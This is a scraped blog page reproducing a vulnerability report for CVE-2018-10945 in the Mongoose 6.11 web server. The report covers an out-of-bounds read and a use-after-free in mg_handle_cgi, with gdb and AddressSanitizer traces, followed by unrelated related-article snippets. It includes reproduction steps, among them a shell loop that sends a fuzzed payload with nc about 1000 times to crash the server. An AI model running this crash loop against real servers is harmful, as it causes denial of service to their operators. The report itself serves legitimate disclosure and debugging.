Hello , I found a vulneratility in mg_handle_cgi function

The function is in mongoose.c , line 8925

 8923   if (mg_start_process(opts->cgi_interpreter, prog, blk.buf, blk.vars, dir,

 8924                        fds[1]) != 0) {

 8925     size_t n = nc->recv_mbuf.len - (hm->message.len - hm->body.len);

 8926     struct mg_connection *cgi_nc =

 8927         mg_add_sock(nc->mgr, fds[0], mg_cgi_ev_handler MG_UD_ARG(nc));

 8928     struct mg_http_proto_data *cgi_pd = mg_http_get_proto_data(nc);

 8929     cgi_pd->cgi.cgi_nc = cgi_nc;

 8930 #if !MG_ENABLE_CALLBACK_USERDATA

 8931     cgi_pd->cgi.cgi_nc->user_data = nc;

 8932 #endif

 8933     nc->flags |= MG_F_HTTP_CGI_PARSE_HEADERS;

 8934     /* Push POST data to the CGI */

 8935     if (n > 0 && n < nc->recv_mbuf.len) {

 8936       mg_send(cgi_pd->cgi.cgi_nc, hm->body.p, n);

 8937     }                                    

note line 8925 , n is assigned by nc->recv_mbuf.len - (hm->message.len - hm->body.len)   , 

when I debug it , I found that nc->recv_mbuf.len=1024 and hm->message.len - hm->body.len is a small number. 

this may lead n > hm->body.len , This would lead program to read the memory out of the hm->body's memory.

And when I trigger this vulneratility many times (200+) , I got a null pointer dereference (uaf )

Normal Produce

The Steps to produce the vulneratility 

Step 1 

Download the latest source of mongoose , and compile the code in directory examples/simplest_web_server 

Then run it

wget https://github.com/cesanta/mongoose/archive/6.11.zip

unzip 6.11.zip

cd mongoose-6.11/examples/simplest_web_server

make

./simplest_web_server

This would start a http server on port 8000

01:09 haclh@ubuntu:simplest_web_server $ ./simplest_web_server

Starting web server on port 8000

Step 2 

Use nc to send payload to the 8000 port

nc 127.0.0.1 8000 < ~/vmdk_kernel/fuzz_workplace/crash.fuzz

PS: the crash.fuzz  file will attach with the email

Then we can get  Segmentation fault (core dumped)

Produce With gdb

If you want to produce the vulneratility in gdb, you should send many times (:may be 200+. payload to tigger crash

Step 1 

Download and compile the source , and use gdb to start it.

01:27 haclh@ubuntu:simplest_web_server $ gdb ./simplest_web_server -q

Reading symbols from ./simplest_web_server...done.

(gdb) set follow-fork-mode parent

(gdb) r

Starting program: /tmp/t/mongoose-6.11/examples/simplest_web_server/simplest_web_server

[Thread debugging using libthread_db enabled]

Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Starting web server on port 8000

ps: you should set follow-fork-mode parent

Step 2

Send the payload many times to the port

01:33 haclh@ubuntu:simplest_web_server $ cat cyc.sh

# !/bin/bash

for i in {1..1000}

do

  nc 127.0.0.1 8000 <  ~/vmdk_kernel/fuzz_workplace/crash.fuzz

  echo $i

done

echo $i

01:33 haclh@ubuntu:simplest_web_server $ ./cyc.sh

I write a shell script to do this.

Then We can see gdb got the crash

01:27 haclh@ubuntu:simplest_web_server $ gdb ./simplest_web_server -q

Reading symbols from ./simplest_web_server...done.

(gdb) set follow-fork-mode parent

(gdb) r

Starting program: /tmp/t/mongoose-6.11/examples/simplest_web_server/simplest_web_server

[Thread debugging using libthread_db enabled]

Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Starting web server on port 8000

Program received signal SIGSEGV, Segmentation fault.

0x00000000004087cf in mg_send (nc=0x6235a0, buf=0x623d10, len=68) at ../../mongoose.c:2635

2635        nc->iface->vtable->tcp_send(nc, buf, len);

(gdb) p nc->iface

$1 = (struct mg_iface *) 0x0

(gdb) p nc

$2 = (struct mg_connection *) 0x6235a0

(gdb) x/4xg 0x6235a0

0x6235a0:   0x00007ffff7bb4cc8  0x00007ffff7bb4cc8

0x6235b0:   0x0000000000000000  0x0000000000000000

(gdb) x/4xg 0x6235a0-0x10

0x623590:   0x0000000000000000  0x0000000000000161

0x6235a0:   0x00007ffff7bb4cc8  0x00007ffff7bb4cc8

(gdb) x/4xg 0x6235a0-0x10+0x160

0x6236f0:   0x0000000000000160  0x00000000000000e0

0x623700:   0x0000000000623b10  0x0000000000000000

(gdb)

we can see that nc->iface is 0x0,  and the code want nc->iface->vtable->tcp_send , this lead null pointer dereference

If you know the gibc malloc , you can find that nc is freed

Produce With AddressSanitizer

And you can comile with clang and AddressSanitizer to get more detail information

 clang -fsanitize=address simplest_web_server.c ../../mongoose.c -o simplest_web_server -g -W -Wall -Werror -I../.. -Wno-unused-function  -DMG_DISABLE_DAV_AUTH -DMG_ENABLE_FAKE_DAVLOCK -pthread

then run it and send the payload to the server, you could get the log below it.

01:19 haclh@ubuntu:simplest_web_server $ ./simplest_web_server 

# Starting web server on port 8000

==16867==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000000980 at pc 0x0000004e653d bp 0x7fffb8bab790 sp 0x7fffb8baaf40

READ of size 876 at 0x619000000980 thread T0

# 0 0x4e653c in __asan_memcpy /home/haclh/vmdk_kernel/libfuzzer-workshop-master/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:23

# 1 0x53b9d6 in mbuf_insert /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:1477:24

# 2 0x53bafc in mbuf_append /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:1490:10

# 3 0x550dc3 in mg_socket_if_tcp_send /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:3356:3

# 4 0x546ffa in mg_send /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:2635:5

# 5 0x582179 in mg_handle_cgi /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:8936:7

# 6 0x56e5a5 in mg_send_http_file /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:7967:5

# 7 0x56adb7 in mg_serve_http /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:8072:3

# 8 0x5219c7 in ev_handler /tmp/t/mongoose-6.11/examples/simplest_web_server/simplest_web_server.c:11:5

# 9 0x544af8 in mg_call /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:2241:5

# 10 0x55d475 in mg_http_call_endpoint_handler /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:8426:3

# 11 0x55cdb3 in mg_http_handler /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:6245:7

# 12 0x544af8 in mg_call /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:2241:5

# 13 0x5494e7 in mg_recv_common /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:2689:3

# 14 0x548c38 in mg_if_recv_tcp_cb /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:2693:3

# 15 0x5526ca in mg_handle_tcp_read /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:3554:7

# 16 0x55196f in mg_mgr_handle_conn /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:3679:9

# 17 0x55564b in mg_socket_if_poll /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:3877:5

# 18 0x546906 in mg_mgr_poll /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:2407:11

# 19 0x52191b in main /tmp/t/mongoose-6.11/examples/simplest_web_server/simplest_web_server.c:33:5

# 20 0x7f4cbf9a582f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291

# 21 0x41ad68 in _start (/tmp/t/mongoose-6.11/examples/simplest_web_server/simplest_web_server+0x41ad68)

0x619000000980 is located 0 bytes to the right of 1024-byte region [0x619000000580,0x619000000980)

allocated by thread T0 here:

# 0 0x4e76f8 in __interceptor_malloc /home/haclh/vmdk_kernel/libfuzzer-workshop-master/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88

# 1 0x552521 in mg_handle_tcp_read /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:3518:24

# 2 0x55196f in mg_mgr_handle_conn /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:3679:9

# 3 0x55564b in mg_socket_if_poll /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:3877:5

# 4 0x546906 in mg_mgr_poll /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:2407:11

# 5 0x52191b in main /tmp/t/mongoose-6.11/examples/simplest_web_server/simplest_web_server.c:33:5

# 6 0x7f4cbf9a582f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/haclh/vmdk_kernel/libfuzzer-workshop-master/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:23 in __asan_memcpy

Shadow bytes around the buggy address:

  0x0c327fff80e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c327fff80f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c327fff8100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c327fff8110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c327fff8120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

=>0x0c327fff8130:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa

  0x0c327fff8140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa

  0x0c327fff8150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa

  0x0c327fff8160: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa

  0x0c327fff8170: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa

  0x0c327fff8180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa

Shadow byte legend (one shadow byte represents 8 application bytes):

  Addressable:           00

  Partially addressable: 01 02 03 04 05 06 07

  Heap left redzone:       fa

  Freed heap region:       fd

  Stack left redzone:      f1

  Stack mid redzone:       f2

  Stack right redzone:     f3

  Stack after return:      f5

  Stack use after scope:   f8

  Global redzone:          f9

  Global init order:       f6

  Poisoned by user:        f7

  Container overflow:      fc

  Array cookie:            ac

  Intra object redzone:    bb

  ASan internal:           fe

  Left alloca redzone:     ca

  Right alloca redzone:    cb

==16867==ABORTING

CVE-2018-10945 mongoose越界访问的更多相关文章

  1. new的越界访问

    今天敲代码的时候发现了一个BUG和大家分享一下,希望大家下次不要犯和我一样的错误. 如果犯了和我一样的错,也能知道自己错在哪里!   <(^-^)> 函数如下:(斐波那契数列的实现) lo ...

  2. linux 内核源代码情景分析——越界访问

    页式存储管理机制通过页面目录和页面表将每个线性地址转换成物理地址,当遇到下面几种情况就会使CPU产生一次缺页中断,从而执行预定的页面异常处理程序: ① 相应的页面目录或页表项为空,也就是该线性地址与物 ...

  3. IOS上解决内存越界访问问题

    IOS经常会混合使用C代码,而在C中,对内存的读写是很频繁的操作. 其中,内存越界读写 unsigned char* p =(unsigned char*)malloc(10); unsigned c ...

  4. 【转载】2018 hosts 持续更新访问 gu歌【更新于:2018-05-03】

      修改HOSTS实现免费,简单访问谷歌的目的   也是比较稳定的方法.修改hosts.修改hosts的方法,原理在于直接存储谷歌网站的IP地址.这样就不用DNS来解析网址了.也就是说,当我们输入谷歌 ...

  5. Netatalk CVE-2018–1160 越界访问漏洞分析

    编译安装 首先下载带有漏洞的源代码 https://sourceforge.net/projects/netatalk/files/netatalk/3.1.11/ 安装一些依赖库(可能不全,到时根据 ...

  6. CreateProcess Access violation(越界访问)

    https://stackoverflow.com/questions/11339186/createprocess-fails-with-an-access-violation My aim is ...

  7. 【转帖】2018年Windows漏洞年度盘点

    2018年Windows漏洞年度盘点丨老漏洞经久不衰,新0day层出不穷 腾讯电脑管家2019-02-12共17875人围观 ,发现 1 个不明物体网络安全资讯 https://www.freebuf ...

  8. [PHP] 2018年终总结

    去掉敏感信息后的不完整版 ==========================================================================2018年12月29日 记 ...

  9. OpenCV(2)-Mat数据结构及访问Mat中像素

    Mat数据结构 一开始OpenCV是基于C语言的,在比较早的教材例如<学习OpenCV>中,讲解的存储图像的数据结构还是IplImage,这样需要手动管理内存.现在存储图像的基本数据结构是 ...

随机推荐

  1. WebDriverAPI(6)

    在指定元素上方进行鼠标悬浮 测试网址 http://www.baidu.com Java语言版本实例 @Test public void roverOnElement() { driver.manag ...

  2. C# 对象相等性判断和同一性判断

    在日常开发中经常需要编写代码比较不同的对象.例如,有时需要将对象都放到一个集合中,并编写代码对集合中的对象进行排序.搜索或者比较. System.Object类有两个Equals方法,如下: 1.实例 ...

  3. linux安装扩展总结

    ---恢复内容开始--- 1.安装php 模块安装命令. wget http://pear.php.net/go-pear 执行 php go_pear 如果是php7 wget http://pea ...

  4. Android_问卷调查

    这个是一个简单的问卷调查,对于我这样的初学者可能会绞尽脑汁想尽办法,去实现一个看起来特别简单的功能,我这个是用Intent传参的办法,来实现将前边的调查来进行统计,并记录,之后将这些信息显示到最后一个 ...

  5. 关于 IOC和spring基本配置详解

    Spring 中的两个概念 IOC控制反转(也叫依赖注入DI): AOP面向切面编程: 控制反转:当某个java对象需要(依赖)另一个java对象是,不是直接创建依赖对象,而是由实现IOC的容器来创建 ...

  6. win10系统自带的浏览器ME如何将网页转成PDF

    不多说,直接上干货! 很多用户都已经开始玩上win10了,补充玩玩一些技巧,当作小灶. 不多废话,在windows 10网页是可以保存为pdf格式.具体如下: 欢迎大家,加入我的微信公众号:大数据躺过 ...

  7. 《垃圾回收的算法与实现》——增量式垃圾回收与RC Immix算法

    增量式垃圾回收 为了控制最大暂停时间,通过逐渐推进垃圾回收即垃圾回收与mutator交替执行. 三色标记算法 以标记-清除算法为例使用三色标记算法. 利用降低吞吐量来缩短最大停顿时间. 基础 将GC中 ...

  8. C++中class的类型转换重载

    注:本文测试实例使用的编译器版本为clang-703.0.29. 我们已经习惯了基本数据类型的显式或隐示转换,如: ; float f = (float)a;float c = a; 其实通过oper ...

  9. LDAP落地实战(四):Jenkins集成OpenLDAP认证

    前几篇分文章分别介绍了OpenLDAP的部署管理和维护以及svn.git的接入,今天我们再下一城接入jenkins. 前情提要:LDAP系列文章 LDAP落地实战(一):OpenLDAP部署及管理维护 ...

  10. 机器学习中的范数规则化之L0、L1与L2范数

    今天看到一篇讲机器学习范数规则化的文章,讲得特别好,记录学习一下.原博客地址(http://blog.csdn.net/zouxy09). 今天我们聊聊机器学习中出现的非常频繁的问题:过拟合与规则化. ...